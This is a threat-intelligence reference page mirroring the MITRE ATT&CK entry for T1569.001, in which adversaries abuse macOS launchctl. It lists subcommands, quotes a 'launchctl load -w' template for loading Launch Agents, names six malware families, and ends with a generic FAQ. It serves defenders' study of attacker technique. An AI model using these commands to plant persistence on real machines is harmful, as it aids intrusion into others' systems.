Description
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w "%s/Library/LaunchAgents/%s" or /bin/launchctl load to execute Launch Agents or Launch Daemons.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
Platforms
Mitigations (1)
User Account ManagementM1018
Prevent users from installing their own launch agents or launch daemons.
Associated Software (6)
| ID | Name | Type | Context |
|---|---|---|---|
| S0451 | LoudMiner | Malware | [LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the <code>/Library/LaunchDaemons/</code> folder using <code>launchc... |
| S1153 | Cuckoo Stealer | Malware | [Cuckoo Stealer](https://attack.mitre.org/software/S1153) can use `launchctl` to load a LaunchAgent for persistence.(Citation: Kandji Cuckoo April 202... |
| S0584 | AppleJeus | Malware | [AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the <code>launchctl</code> command.(Citation: CISA AppleJeus Feb 20... |
| S1048 | macOS.OSAMiner | Malware | [macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `launchctl` to restart the [Launch Agent](https://attack.mitre.org/techniques/T1543... |
| S0658 | XCSSET | Malware | [XCSSET](https://attack.mitre.org/software/S0658) loads a system level launchdaemon using the <code>launchctl load -w</code> command from <code>/Syste... |
| S0274 | Calisto | Malware | [Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July ... |
References
- Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- SS64. (n.d.). launchctl. Retrieved March 28, 2020.
Frequently Asked Questions
What is T1569.001 (Launchctl)?
T1569.001 is a MITRE ATT&CK technique named 'Launchctl'. It belongs to the Execution tactic(s). Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-lin...
How can T1569.001 be detected?
Detection of T1569.001 (Launchctl) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1569.001?
There are 1 documented mitigations for T1569.001. Key mitigations include: User Account Management.
Which threat groups use T1569.001?
While specific threat group attribution may vary, this technique has been observed in various real-world attacks. Check the MITRE ATT&CK website for the latest threat intelligence.